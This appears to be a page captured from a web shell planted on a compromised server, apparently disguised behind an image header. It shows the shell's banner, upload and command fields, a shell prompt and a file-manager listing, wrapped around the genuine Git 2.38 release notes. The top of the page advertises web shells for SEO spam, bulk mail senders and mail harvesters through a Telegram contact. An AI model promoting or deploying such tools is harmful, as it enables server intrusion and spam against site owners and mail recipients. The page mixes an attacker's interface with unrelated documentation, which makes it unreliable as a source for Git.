����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
Git v2.38 Release Notes
=======================

UI, Workflows & Features

 * "git remote show [-n] frotz" now pays attention to negative
   pathspec.

 * "git push" sometimes performs poorly when reachability bitmaps are
   used, even in a repository where other operations are helped by
   bitmaps.  The push.useBitmaps configuration variable is introduced
   to allow disabling use of reachability bitmaps only for "git push".

 * "git grep -m<max-hits>" is a way to limit the hits shown per file.

 * "git merge-tree" learned a new mode where it takes two commits and
   computes a tree that would result in the merge commit, if the
   histories leading to these two commits were to be merged.

 * "git mv A B" in a sparsely populated working tree can be asked to
   move a path between directories that are "in cone" (i.e. expected
   to be materialized in the working tree) and "out of cone"
   (i.e. expected to be hidden).  The handling of such cases has been
   improved.

 * Earlier, HTTP transport clients learned to tell the server side
   what locale they are in by sending Accept-Language HTTP header, but
   this was done only for some requests but not others.

 * Introduce a safe.barerepository configuration variable that
   allows users to forbid discovery of bare repositories.

 * Various messages that come from the pack-bitmap codepaths have been
   tweaked.

 * "git rebase -i" learns to update branches whose tip appear in the
   rebased range with "--update-refs" option.

 * "git ls-files" learns the "--format" option to tweak its output.

 * "git cat-file" learned an option to use the mailmap when showing
   commit and tag objects.

 * When "git merge" finds that it cannot perform a merge, it should
   restore the working tree to the state before the command was
   initiated, but in some corner cases it didn't.

 * Operating modes like "--batch" of "git cat-file" command learned to
   take NUL-terminated input, instead of one-item-per-line.

 * "git rm" has become more aware of the sparse-index feature.

 * "git rev-list --disk-usage" learned to take an optional value
   "human" to show the reported value in human-readable format, like
   "3.40MiB".

 * The "diagnose" feature to create a zip archive for diagnostic
   material has been lifted from "scalar" and made into a feature of
   "git bugreport".

 * The namespaces used by "log --decorate" from "refs/" hierarchy by
   default has been tightened.

 * "git rev-list --ancestry-path=C A..B" is a natural extension of
   "git rev-list A..B"; instead of choosing a subset of A..B to those
   that have ancestry relationship with A, it lets a subset with
   ancestry relationship with C.

 * "scalar" now enables built-in fsmonitor on enlisted repositories,
   when able.

 * The bash prompt (in contrib/) learned to optionally indicate when
   the index is unmerged.

 * "git clone" command learned the "--bundle-uri" option to coordinate
   with hosting sites the use of pre-prepared bundle files.

 * "git range-diff" learned to honor pathspec argument if given.

 * "git format-patch --from=<ident>" can be told to add an in-body
   "From:" line even for commits that are authored by the given
   <ident> with "--force-in-body-from" option.

 * The built-in fsmonitor refuses to work on a network mounted
   repositories; a configuration knob for users to override this has
   been introduced.

 * The "scalar" addition from Microsoft is now part of the core Git
   installation.


Performance, Internal Implementation, Development Support etc.

 * Collection of what is referenced by objects in promisor packs have
   been optimized to inspect these objects in the in-pack order.

 * Introduce a helper to see if a branch is already being worked on
   (hence should not be newly checked out in a working tree), which
   performs much better than the existing find_shared_symref() to
   replace many uses of the latter.

 * Teach "git archive" to (optionally and then by default) avoid
   spawning an external "gzip" process when creating ".tar.gz" (and
   ".tgz") archives.

 * Allow large objects read from a packstream to be streamed into a
   loose object file straight, without having to keep it in-core as a
   whole.

 * Further preparation to turn git-submodule.sh into a builtin
   continues.

 * Apply Coccinelle rule to turn raw memmove() into MOVE_ARRAY() cpp
   macro, which would improve maintainability and readability.

 * Teach "make all" to build gitweb as well.

 * Tweak tests so that they still work when the "git init" template
   did not create .git/info directory.

 * Add Coccinelle rules to detect the pattern of initializing and then
   finalizing a structure without using it in between at all, which
   happens after code restructuring and the compilers fail to
   recognize as an unused variable.

 * The code to convert between GPG trust level strings and internal
   constants we use to represent them have been cleaned up.

 * Support for libnettle as SHA256 implementation has been added.

 * The way "git multi-pack" uses parse-options API has been improved.

 * A Coccinelle rule (in contrib/) to encourage use of COPY_ARRAY
   macro has been improved.

 * API tweak to make it easier to run fuzz testing on commit-graph parser.

 * Omit fsync-related trace2 entries when their values are all zero.

 * The codepath to write multi-pack index has been taught to release a
   large chunk of memory that holds an array of objects in the packs,
   as soon as it is done with the array, to reduce memory consumption.

 * Add a level of redirection to array allocation API in xdiff part,
   to make it easier to share with the libgit2 project.

 * "git fetch" client logs the partial clone filter used in the trace2
   output.

 * The "bundle URI" design gets documented.

 * The common ancestor negotiation exchange during a "git fetch"
   session now leaves trace log.

 * Test portability improvements.
   (merge 4d1d843be7 mt/rot13-in-c later to maint).

 * The "subcommand" mode is introduced to parse-options API and update
   the command line parser of Git commands with subcommands.

 * The pack bitmap file gained a bitmap-lookup table to speed up
   locating the necessary bitmap for a given commit.

 * The assembly version of SHA-1 implementation for PPC has been
   removed.

 * The server side that responds to "git fetch" and "git clone"
   request has been optimized by allowing it to send objects in its
   object store without recomputing and validating the object names.

 * Annotate function parameters that are not used (but cannot be
   removed for structural reasons), to prepare us to later compile
   with -Wunused warning turned on.

 * Share the text used to explain configuration variables used by "git
   <subcmd>" in "git help <subcmd>" with the text from "git help config".

 * "git mv A B" in a sparsely populated working tree can be asked to
   move a path from a directory that is "in cone" to another directory
   that is "out of cone".  Handling of such a case has been improved.

 * The chainlint script for our tests has been revamped.


Fixes since v2.37
-----------------

 * Rewrite of "git add -i" in C that appeared in Git 2.25 didn't
   correctly record a removed file to the index, which was fixed.

 * Certain diff options are currently ignored when combined-diff is
   shown; mark them as incompatible with the feature.

 * Adjust technical/bitmap-format to be formatted by AsciiDoc, and
   add some missing information to the documentation.

 * Fixes for tests when the source directory has unusual characters in
   its path, e.g. whitespaces, double-quotes, etc.

 * "git mktree --missing" lazily fetched objects that are missing from
   the local object store, which was totally unnecessary for the purpose
   of creating the tree object(s) from its input.

 * Give _() markings to fatal/warning/usage: labels that are shown in
   front of these messages.

 * References to commands-to-be-typed-literally in "git rebase"
   documentation mark-up have been corrected.

 * In a non-bare repository, the behavior of Git when the
   core.worktree configuration variable points at a directory that has
   a repository as its subdirectory, regressed in Git 2.27 days.

 * Recent update to vimdiff layout code has been made more robust
   against different end-user vim settings.

 * Plug various memory leaks, both in the main code and in test-tool
   commands.

 * Fixes a long-standing corner case bug around directory renames in
   the merge-ort strategy.

 * The resolve-undo information in the index was not protected against
   GC, which has been corrected.

 * A corner case bug where lazily fetching objects from a promisor
   remote resulted in infinite recursion has been corrected.

 * "git clone" from a repository with some ref whose HEAD is unborn
   did not set the HEAD in the resulting repository correctly, which
   has been corrected.

 * An earlier attempt to plug leaks placed a clean-up label to jump to
   at a bogus place, which as been corrected.

 * Variable quoting fix in the vimdiff driver of "git mergetool"

 * "git shortlog -n" relied on the underlying qsort() to be stable,
   which shouldn't have.  Fixed.

 * A fix for a regression in test framework.

 * mkstemp() emulation on Windows has been improved.

 * Add missing documentation for "include" and "includeIf" features in
   "git config" file format, which incidentally teaches the command
   line completion to include them in its offerings.

 * Avoid "white/black-list" in documentation and code comments.

 * Workaround for a compiler warning against use of die() in
   osx-keychain (in contrib/).

 * Workaround for a false positive compiler warning.

 * "git p4" working on UTF-16 files on Windows did not implement
   CRLF-to-LF conversion correctly, which has been corrected.

 * "git p4" did not handle non-ASCII client name well, which has been
   corrected.

 * "rerere-train" script (in contrib/) used to honor commit.gpgSign
   while recreating the throw-away merges.

 * "git checkout" miscounted the paths it updated, which has been
   corrected.

 * Fix for a bug that makes write-tree to fail to write out a
   non-existent index as a tree, introduced in 2.37.

 * There was a bug in the codepath to upgrade generation information
   in commit-graph from v1 to v2 format, which has been corrected.

 * Gitweb had legacy URL shortener that is specific to the way
   projects hosted on kernel.org used to (but no longer) work, which
   has been removed.

 * Fix build procedure for Windows that uses CMake so that it can pick
   up the shell interpreter from local installation location.

 * Conditionally allow building Python interpreter on Windows

 * Fix to lstat() emulation on Windows.

 * Older gcc with -Wall complains about the universal zero initializer
   "struct s = { 0 };" idiom, which makes developers' lives
   inconvenient (as -Werror is enabled by DEVELOPER=YesPlease).  The
   build procedure has been tweaked to help these compilers.

 * Plug memory leaks in the failure code path in the "merge-ort" merge
   strategy backend.

 * "git symbolic-ref symref non..sen..se" is now diagnosed as an error.

 * A follow-up fix to a fix for a regression in 2.36 around hooks.

 * Avoid repeatedly running getconf to ask libc version in the test
   suite, and instead just as it once per script.

 * Platform-specific code that determines if a directory is OK to use
   as a repository has been taught to report more details, especially
   on Windows.

 * "vimdiff3" regression fix.

 * "git fsck" reads mode from tree objects but canonicalizes the mode
   before passing it to the logic to check object sanity, which has
   hid broken tree objects from the checking logic.  This has been
   corrected, but to help existing projects with broken tree objects
   that they cannot fix retroactively, the severity of anomalies this
   code detects has been demoted to "info" for now.

 * Fixes to sparse index compatibility work for "reset" and "checkout"
   commands.

 * An earlier optimization discarded a tree-object buffer that is
   still in use, which has been corrected.

 * Fix deadlocks between main Git process and subprocess spawned via
   the pipe_command() API, that can kill "git add -p" that was
   reimplemented in C recently.

 * The sequencer machinery translated messages left in the reflog by
   mistake, which has been corrected.

 * xcalloc(), imitating calloc(), takes "number of elements of the
   array", and "size of a single element", in this order.  A call that
   does not follow this ordering has been corrected.

 * The preload-index codepath made copies of pathspec to give to
   multiple threads, which were left leaked.

 * Update the version of Ubuntu used for GitHub Actions CI from 18.04
   to 22.04.

 * The auto-stashed local changes created by "git merge --autostash"
   was mixed into a conflicted state left in the working tree, which
   has been corrected.

 * Multi-pack index got corrupted when preferred pack changed from one
   pack to another in a certain way, which has been corrected.
   (merge 99e4d084ff tb/midx-with-changing-preferred-pack-fix later to maint).

 * The clean-up of temporary files created via mks_tempfile_dt() was
   racy and attempted to unlink() the leading directory when signals
   are involved, which has been corrected.
   (merge babe2e0559 rs/tempfile-cleanup-race-fix later to maint).

 * FreeBSD portability fix for "git maintenance" that spawns "crontab"
   to schedule tasks.
   (merge ee69e7884e bc/gc-crontab-fix later to maint).

 * Those who use diff-so-fancy as the diff-filter noticed a regression
   or two in the code that parses the diff output in the built-in
   version of "add -p", which has been corrected.
   (merge 0a101676e5 js/add-p-diff-parsing-fix later to maint).

 * Segfault fix-up to an earlier fix to the topic to teach "git reset"
   and "git checkout" work better in a sparse checkout.
   (merge 037f8ea6d9 vd/sparse-reset-checkout-fixes later to maint).

 * "git diff --no-index A B" managed its the pathnames of its two
   input files rather haphazardly, sometimes leaking them.  The
   command line argument processing has been straightened out to clean
   it up.
   (merge 2b43dd0eb5 rs/diff-no-index-cleanup later to maint).

 * "git rev-list --verify-objects" ought to inspect the contents of
   objects and notice corrupted ones, but it didn't when the commit
   graph is in use, which has been corrected.
   (merge b27ccae34b jk/rev-list-verify-objects-fix later to maint).

 * More fixes to "add -p"
   (merge 64ec8efb83 js/builtin-add-p-portability-fix later to maint).

 * The parser in the script interface to parse-options in "git
   rev-parse" has been updated to diagnose a bogus input correctly.
   (merge f20b9c36d0 ow/rev-parse-parseopt-fix later to maint).

 * The code that manages list-object-filter structure, used in partial
   clones, leaked the instances, which has been plugged.
   (merge 66eede4a37 jk/plug-list-object-filter-leaks later to maint).

 * Fix another UI regression in the reimplemented "add -p".
   (merge f6f0ee247f rs/add-p-worktree-mode-prompt-fix later to maint).

 * "git fetch" over protocol v2 sent an incorrect ref prefix request
   to the server and made "git pull" with configured fetch refspec
   that does not cover the remote branch to merge with fail, which has
   been corrected.
   (merge 49ca2fba39 jk/proto-v2-ref-prefix-fix later to maint).

 * A result from opendir() was leaking in the commit-graph expiration
   codepath, which has been plugged.
   (merge 12f1ae5324 ml/commit-graph-expire-dir-leak-fix later to maint).

 * Just like we have coding guidelines, we now have guidelines for
   reviewers.
   (merge e01b851923 vd/doc-reviewing-guidelines later to maint).

 * Other code cleanup, docfix, build fix, etc.
   (merge 77b9e85c0f vd/fix-perf-tests later to maint).
   (merge 0682bc43f5 jk/test-crontab-fixes later to maint).
   (merge b46dd1726c cc/doc-trailer-whitespace-rules later to maint).

Filemanager

Name Type Size Permission Actions
1.5.0.1.adoc File 1.23 KB 0644
1.5.0.2.adoc File 2.25 KB 0644
1.5.0.3.adoc File 1.54 KB 0644
1.5.0.4.adoc File 462 B 0644
1.5.0.5.adoc File 609 B 0644
1.5.0.6.adoc File 484 B 0644
1.5.0.7.adoc File 482 B 0644
1.5.0.adoc File 18.2 KB 0644
1.5.1.1.adoc File 2.11 KB 0644
1.5.1.2.adoc File 1.61 KB 0644
1.5.1.3.adoc File 1.53 KB 0644
1.5.1.4.adoc File 843 B 0644
1.5.1.5.adoc File 1.4 KB 0644
1.5.1.6.adoc File 1.48 KB 0644
1.5.1.adoc File 12.98 KB 0644
1.5.2.1.adoc File 1.42 KB 0644
1.5.2.2.adoc File 2.04 KB 0644
1.5.2.3.adoc File 796 B 0644
1.5.2.4.adoc File 802 B 0644
1.5.2.5.adoc File 928 B 0644
1.5.2.adoc File 7.18 KB 0644
1.5.3.1.adoc File 326 B 0644
1.5.3.2.adoc File 1.89 KB 0644
1.5.3.3.adoc File 896 B 0644
1.5.3.4.adoc File 1.18 KB 0644
1.5.3.5.adoc File 3.3 KB 0644
1.5.3.6.adoc File 1.4 KB 0644
1.5.3.7.adoc File 1.55 KB 0644
1.5.3.8.adoc File 783 B 0644
1.5.3.adoc File 13.7 KB 0644
1.5.4.1.adoc File 524 B 0644
1.5.4.2.adoc File 1.49 KB 0644
1.5.4.3.adoc File 997 B 0644
1.5.4.4.adoc File 2.56 KB 0644
1.5.4.5.adoc File 2.19 KB 0644
1.5.4.6.adoc File 1.41 KB 0644
1.5.4.7.adoc File 342 B 0644
1.5.4.adoc File 14.09 KB 0644
1.5.5.1.adoc File 1.46 KB 0644
1.5.5.2.adoc File 772 B 0644
1.5.5.3.adoc File 305 B 0644
1.5.5.4.adoc File 140 B 0644
1.5.5.5.adoc File 449 B 0644
1.5.5.6.adoc File 342 B 0644
1.5.5.adoc File 7.42 KB 0644
1.5.6.1.adoc File 793 B 0644
1.5.6.2.adoc File 1.42 KB 0644
1.5.6.3.adoc File 2.06 KB 0644
1.5.6.4.adoc File 1.54 KB 0644
1.5.6.5.adoc File 1.02 KB 0644
1.5.6.6.adoc File 342 B 0644
1.5.6.adoc File 3.75 KB 0644
1.6.0.1.adoc File 1.16 KB 0644
1.6.0.2.adoc File 2.77 KB 0644
1.6.0.3.adoc File 4.21 KB 0644
1.6.0.4.adoc File 1.26 KB 0644
1.6.0.5.adoc File 1.97 KB 0644
1.6.0.6.adoc File 1.17 KB 0644
1.6.0.adoc File 9.81 KB 0644
1.6.1.1.adoc File 1.93 KB 0644
1.6.1.2.adoc File 1.6 KB 0644
1.6.1.3.adoc File 847 B 0644
1.6.1.4.adoc File 1.56 KB 0644
1.6.1.adoc File 10.08 KB 0644
1.6.2.1.adoc File 597 B 0644
1.6.2.2.adoc File 1.47 KB 0644
1.6.2.3.adoc File 781 B 0644
1.6.2.4.adoc File 1.32 KB 0644
1.6.2.5.adoc File 688 B 0644
1.6.2.adoc File 5.79 KB 0644
1.6.3.1.adoc File 343 B 0644
1.6.3.2.adoc File 2.22 KB 0644
1.6.3.3.adoc File 1.35 KB 0644
1.6.3.4.adoc File 1.18 KB 0644
1.6.3.adoc File 6.67 KB 0644
1.6.4.1.adoc File 1.86 KB 0644
1.6.4.2.adoc File 1.18 KB 0644
1.6.4.3.adoc File 1.12 KB 0644
1.6.4.4.adoc File 1.01 KB 0644
1.6.4.5.adoc File 605 B 0644
1.6.4.adoc File 5.27 KB 0644
1.6.5.1.adoc File 549 B 0644
1.6.5.2.adoc File 581 B 0644
1.6.5.3.adoc File 2.43 KB 0644
1.6.5.4.adoc File 1.24 KB 0644
1.6.5.5.adoc File 1.85 KB 0644
1.6.5.6.adoc File 791 B 0644
1.6.5.7.adoc File 771 B 0644
1.6.5.8.adoc File 900 B 0644
1.6.5.9.adoc File 581 B 0644
1.6.5.adoc File 6.19 KB 0644
1.6.6.1.adoc File 1.2 KB 0644
1.6.6.2.adoc File 1.56 KB 0644
1.6.6.3.adoc File 751 B 0644
1.6.6.adoc File 9.28 KB 0644
1.7.0.1.adoc File 1.26 KB 0644
1.7.0.2.adoc File 1.44 KB 0644
1.7.0.3.adoc File 1.15 KB 0644
1.7.0.4.adoc File 888 B 0644
1.7.0.5.adoc File 915 B 0644
1.7.0.6.adoc File 365 B 0644
1.7.0.7.adoc File 467 B 0644
1.7.0.8.adoc File 452 B 0644
1.7.0.9.adoc File 219 B 0644
1.7.0.adoc File 8.56 KB 0644
1.7.1.1.adoc File 3.74 KB 0644
1.7.1.2.adoc File 1.04 KB 0644
1.7.1.3.adoc File 452 B 0644
1.7.1.4.adoc File 219 B 0644
1.7.1.adoc File 2.87 KB 0644
1.7.10.1.adoc File 3 KB 0644
1.7.10.2.adoc File 3.36 KB 0644
1.7.10.3.adoc File 1.83 KB 0644
1.7.10.4.adoc File 1.03 KB 0644
1.7.10.5.adoc File 397 B 0644
1.7.10.adoc File 8.81 KB 0644
1.7.11.1.adoc File 224 B 0644
1.7.11.2.adoc File 2.24 KB 0644
1.7.11.3.adoc File 2.26 KB 0644
1.7.11.4.adoc File 1.14 KB 0644
1.7.11.5.adoc File 1.26 KB 0644
1.7.11.6.adoc File 3.36 KB 0644
1.7.11.7.adoc File 1.91 KB 0644
1.7.11.adoc File 5.38 KB 0644
1.7.12.1.adoc File 5.66 KB 0644
1.7.12.2.adoc File 1.73 KB 0644
1.7.12.3.adoc File 1.3 KB 0644
1.7.12.4.adoc File 712 B 0644
1.7.12.adoc File 5.21 KB 0644
1.7.2.1.adoc File 806 B 0644
1.7.2.2.adoc File 695 B 0644
1.7.2.3.adoc File 1.32 KB 0644
1.7.2.4.adoc File 452 B 0644
1.7.2.5.adoc File 219 B 0644
1.7.2.adoc File 5.84 KB 0644
1.7.3.1.adoc File 425 B 0644
1.7.3.2.adoc File 149 B 0644
1.7.3.3.adoc File 2.03 KB 0644
1.7.3.4.adoc File 1.6 KB 0644
1.7.3.5.adoc File 1.42 KB 0644
1.7.3.adoc File 2.58 KB 0644
1.7.4.1.adoc File 899 B 0644
1.7.4.2.adoc File 2.24 KB 0644
1.7.4.3.adoc File 1.22 KB 0644
1.7.4.4.adoc File 1.26 KB 0644
1.7.4.5.adoc File 127 B 0644
1.7.4.adoc File 6.35 KB 0644
1.7.5.1.adoc File 1.86 KB 0644
1.7.5.2.adoc File 2.14 KB 0644
1.7.5.3.adoc File 1.08 KB 0644
1.7.5.4.adoc File 754 B 0644
1.7.5.adoc File 5.2 KB 0644
1.7.6.1.adoc File 2.2 KB 0644
1.7.6.2.adoc File 245 B 0644
1.7.6.3.adoc File 792 B 0644
1.7.6.4.adoc File 1.23 KB 0644
1.7.6.5.adoc File 969 B 0644
1.7.6.6.adoc File 587 B 0644
1.7.6.adoc File 5.38 KB 0644
1.7.7.1.adoc File 2.38 KB 0644
1.7.7.2.adoc File 1.59 KB 0644
1.7.7.3.adoc File 696 B 0644
1.7.7.4.adoc File 444 B 0644
1.7.7.5.adoc File 481 B 0644
1.7.7.6.adoc File 791 B 0644
1.7.7.7.adoc File 334 B 0644
1.7.7.adoc File 5.28 KB 0644
1.7.8.1.adoc File 1.4 KB 0644
1.7.8.2.adoc File 2.86 KB 0644
1.7.8.3.adoc File 431 B 0644
1.7.8.4.adoc File 921 B 0644
1.7.8.5.adoc File 606 B 0644
1.7.8.6.adoc File 621 B 0644
1.7.8.adoc File 6.2 KB 0644
1.7.9.1.adoc File 2.4 KB 0644
1.7.9.2.adoc File 2.64 KB 0644
1.7.9.3.adoc File 1.91 KB 0644
1.7.9.4.adoc File 887 B 0644
1.7.9.5.adoc File 731 B 0644
1.7.9.6.adoc File 432 B 0644
1.7.9.7.adoc File 371 B 0644
1.7.9.adoc File 4.27 KB 0644
1.8.0.1.adoc File 2.4 KB 0644
1.8.0.2.adoc File 1.22 KB 0644
1.8.0.3.adoc File 424 B 0644
1.8.0.adoc File 10.81 KB 0644
1.8.1.1.adoc File 3.49 KB 0644
1.8.1.2.adoc File 991 B 0644
1.8.1.3.adoc File 1.7 KB 0644
1.8.1.4.adoc File 337 B 0644
1.8.1.5.adoc File 1.89 KB 0644
1.8.1.6.adoc File 1.53 KB 0644
1.8.1.adoc File 9.4 KB 0644
1.8.2.1.adoc File 4.45 KB 0644
1.8.2.2.adoc File 2.38 KB 0644
1.8.2.3.adoc File 672 B 0644
1.8.2.adoc File 21.62 KB 0644
1.8.3.1.adoc File 433 B 0644
1.8.3.2.adoc File 2.35 KB 0644
1.8.3.3.adoc File 1.74 KB 0644
1.8.3.4.adoc File 700 B 0644
1.8.3.adoc File 17.91 KB 0644
1.8.4.1.adoc File 2.94 KB 0644
1.8.4.2.adoc File 3.22 KB 0644
1.8.4.3.adoc File 2.16 KB 0644
1.8.4.4.adoc File 342 B 0644
1.8.4.5.adoc File 421 B 0644
1.8.4.adoc File 20.76 KB 0644
1.8.5.1.adoc File 254 B 0644
1.8.5.2.adoc File 656 B 0644
1.8.5.3.adoc File 859 B 0644
1.8.5.4.adoc File 1.87 KB 0644
1.8.5.5.adoc File 1.43 KB 0644
1.8.5.6.adoc File 1.65 KB 0644
1.8.5.adoc File 19.87 KB 0644
1.9.0.adoc File 14.84 KB 0644
1.9.1.adoc File 2.35 KB 0644
1.9.2.adoc File 2.74 KB 0644
1.9.3.adoc File 635 B 0644
1.9.4.adoc File 607 B 0644
1.9.5.adoc File 1.64 KB 0644
2.0.0.adoc File 15.54 KB 0644
2.0.1.adoc File 5.05 KB 0644
2.0.2.adoc File 1.32 KB 0644
2.0.3.adoc File 592 B 0644
2.0.4.adoc File 153 B 0644
2.0.5.adoc File 1.64 KB 0644
2.1.0.adoc File 16.93 KB 0644
2.1.1.adoc File 1.76 KB 0644
2.1.2.adoc File 768 B 0644
2.1.3.adoc File 970 B 0644
2.1.4.adoc File 1.64 KB 0644
2.10.0.adoc File 29.43 KB 0644
2.10.1.adoc File 5.6 KB 0644
2.10.2.adoc File 5.17 KB 0644
2.10.3.adoc File 2.3 KB 0644
2.10.4.adoc File 124 B 0644
2.10.5.adoc File 561 B 0644
2.11.0.adoc File 27.34 KB 0644
2.11.1.adoc File 6.66 KB 0644
2.11.2.adoc File 479 B 0644
2.11.3.adoc File 124 B 0644
2.11.4.adoc File 561 B 0644
2.12.0.adoc File 21.58 KB 0644
2.12.1.adoc File 1.57 KB 0644
2.12.2.adoc File 3.53 KB 0644
2.12.3.adoc File 2.48 KB 0644
2.12.4.adoc File 124 B 0644
2.12.5.adoc File 561 B 0644
2.13.0.adoc File 27.56 KB 0644
2.13.1.adoc File 4.91 KB 0644
2.13.2.adoc File 2.13 KB 0644
2.13.3.adoc File 2.33 KB 0644
2.13.4.adoc File 1.05 KB 0644
2.13.5.adoc File 124 B 0644
2.13.6.adoc File 561 B 0644
2.13.7.adoc File 780 B 0644
2.14.0.adoc File 22.2 KB 0644
2.14.1.adoc File 124 B 0644
2.14.2.adoc File 4.38 KB 0644
2.14.3.adoc File 3.92 KB 0644
2.14.4.adoc File 167 B 0644
2.14.5.adoc File 578 B 0644
2.14.6.adoc File 2.09 KB 0644
2.15.0.adoc File 21.46 KB 0644
2.15.1.adoc File 3.35 KB 0644
2.15.2.adoc File 1.85 KB 0644
2.15.3.adoc File 210 B 0644
2.15.4.adoc File 482 B 0644
2.16.0.adoc File 20.26 KB 0644
2.16.1.adoc File 305 B 0644
2.16.2.adoc File 1.06 KB 0644
2.16.3.adoc File 1.72 KB 0644
2.16.4.adoc File 167 B 0644
2.16.5.adoc File 210 B 0644
2.16.6.adoc File 333 B 0644
2.17.0.adoc File 17.46 KB 0644
2.17.1.adoc File 617 B 0644
2.17.2.adoc File 493 B 0644
2.17.3.adoc File 490 B 0644
2.17.4.adoc File 520 B 0644
2.17.5.adoc File 828 B 0644
2.17.6.adoc File 511 B 0644
2.18.0.adoc File 26.16 KB 0644
2.18.1.adoc File 227 B 0644
2.18.2.adoc File 343 B 0644
2.18.3.adoc File 167 B 0644
2.18.4.adoc File 167 B 0644
2.18.5.adoc File 207 B 0644
2.19.0.adoc File 27.48 KB 0644
2.19.1.adoc File 227 B 0644
2.19.2.adoc File 4.34 KB 0644
2.19.3.adoc File 343 B 0644
2.19.4.adoc File 167 B 0644
2.19.5.adoc File 167 B 0644
2.19.6.adoc File 221 B 0644
2.2.0.adoc File 13.03 KB 0644
2.2.1.adoc File 1.63 KB 0644
2.2.2.adoc File 2.3 KB 0644
2.2.3.adoc File 284 B 0644
2.20.0.adoc File 31.77 KB 0644
2.20.1.adoc File 616 B 0644
2.20.2.adoc File 828 B 0644
2.20.3.adoc File 167 B 0644
2.20.4.adoc File 167 B 0644
2.20.5.adoc File 230 B 0644
2.21.0.adoc File 19.66 KB 0644
2.21.1.adoc File 530 B 0644
2.21.2.adoc File 167 B 0644
2.21.3.adoc File 167 B 0644
2.21.4.adoc File 239 B 0644
2.22.0.adoc File 26.35 KB 0644
2.22.1.adoc File 6.09 KB 0644
2.22.2.adoc File 377 B 0644
2.22.3.adoc File 167 B 0644
2.22.4.adoc File 167 B 0644
2.22.5.adoc File 248 B 0644
2.23.0.adoc File 13.62 KB 0644
2.23.1.adoc File 377 B 0644
2.23.2.adoc File 167 B 0644
2.23.3.adoc File 167 B 0644
2.23.4.adoc File 257 B 0644
2.24.0.adoc File 17.33 KB 0644
2.24.1.adoc File 377 B 0644
2.24.2.adoc File 167 B 0644
2.24.3.adoc File 167 B 0644
2.24.4.adoc File 266 B 0644
2.25.0.adoc File 16.03 KB 0644
2.25.1.adoc File 2.09 KB 0644
2.25.2.adoc File 2.44 KB 0644
2.25.3.adoc File 167 B 0644
2.25.4.adoc File 167 B 0644
2.25.5.adoc File 275 B 0644
2.26.0.adoc File 13.97 KB 0644
2.26.1.adoc File 167 B 0644
2.26.2.adoc File 167 B 0644
2.26.3.adoc File 284 B 0644
2.27.0.adoc File 22.97 KB 0644
2.27.1.adoc File 293 B 0644
2.28.0.adoc File 9.48 KB 0644
2.28.1.adoc File 302 B 0644
2.29.0.adoc File 22.77 KB 0644
2.29.1.adoc File 487 B 0644
2.29.2.adoc File 331 B 0644
2.29.3.adoc File 311 B 0644
2.3.0.adoc File 12.56 KB 0644
2.3.1.adoc File 1.95 KB 0644
2.3.10.adoc File 711 B 0644
2.3.2.adoc File 2.94 KB 0644
2.3.3.adoc File 1.49 KB 0644
2.3.4.adoc File 1.12 KB 0644
2.3.5.adoc File 1.73 KB 0644
2.3.6.adoc File 400 B 0644
2.3.7.adoc File 762 B 0644
2.3.8.adoc File 814 B 0644
2.3.9.adoc File 284 B 0644
2.30.0.adoc File 16.97 KB 0644
2.30.1.adoc File 1.92 KB 0644
2.30.2.adoc File 320 B 0644
2.30.3.adoc File 865 B 0644
2.30.4.adoc File 684 B 0644
2.30.5.adoc File 445 B 0644
2.30.6.adoc File 2.2 KB 0644
2.30.7.adoc File 3.83 KB 0644
2.30.8.adoc File 1.69 KB 0644
2.30.9.adoc File 1.48 KB 0644
2.31.0.adoc File 15.03 KB 0644
2.31.1.adoc File 895 B 0644
2.31.2.adoc File 207 B 0644
2.31.3.adoc File 136 B 0644
2.31.4.adoc File 207 B 0644
2.31.5.adoc File 167 B 0644
2.31.6.adoc File 167 B 0644
2.31.7.adoc File 227 B 0644
2.31.8.adoc File 241 B 0644
2.32.0.adoc File 17.02 KB 0644
2.32.1.adoc File 221 B 0644
2.32.2.adoc File 136 B 0644
2.32.3.adoc File 221 B 0644
2.32.4.adoc File 167 B 0644
2.32.5.adoc File 273 B 0644
2.32.6.adoc File 241 B 0644
2.32.7.adoc File 255 B 0644
2.33.0.adoc File 11.95 KB 0644
2.33.1.adoc File 5.04 KB 0644
2.33.2.adoc File 500 B 0644
2.33.3.adoc File 136 B 0644
2.33.4.adoc File 230 B 0644
2.33.5.adoc File 167 B 0644
2.33.6.adoc File 167 B 0644
2.33.7.adoc File 250 B 0644
2.33.8.adoc File 264 B 0644
2.34.0.adoc File 17.76 KB 0644
2.34.1.adoc File 794 B 0644
2.34.2.adoc File 239 B 0644
2.34.3.adoc File 136 B 0644
2.34.4.adoc File 239 B 0644
2.34.5.adoc File 167 B 0644
2.34.6.adoc File 167 B 0644
2.34.7.adoc File 259 B 0644
2.34.8.adoc File 273 B 0644
2.35.0.adoc File 17.63 KB 0644
2.35.1.adoc File 195 B 0644
2.35.2.adoc File 248 B 0644
2.35.3.adoc File 136 B 0644
2.35.4.adoc File 248 B 0644
2.35.5.adoc File 167 B 0644
2.35.6.adoc File 167 B 0644
2.35.7.adoc File 268 B 0644
2.35.8.adoc File 282 B 0644
2.36.0.adoc File 18.68 KB 0644
2.36.1.adoc File 1.18 KB 0644
2.36.2.adoc File 2.09 KB 0644
2.36.3.adoc File 167 B 0644
2.36.4.adoc File 167 B 0644
2.36.5.adoc File 277 B 0644
2.36.6.adoc File 291 B 0644
2.37.0.adoc File 14.55 KB 0644
2.37.1.adoc File 580 B 0644
2.37.2.adoc File 3.15 KB 0644
2.37.3.adoc File 1.68 KB 0644
2.37.4.adoc File 2.48 KB 0644
2.37.5.adoc File 167 B 0644
2.37.6.adoc File 286 B 0644
2.37.7.adoc File 302 B 0644
2.38.0.adoc File 15.68 KB 0644
2.38.1.adoc File 167 B 0644
2.38.2.adoc File 2.31 KB 0644
2.38.3.adoc File 167 B 0644
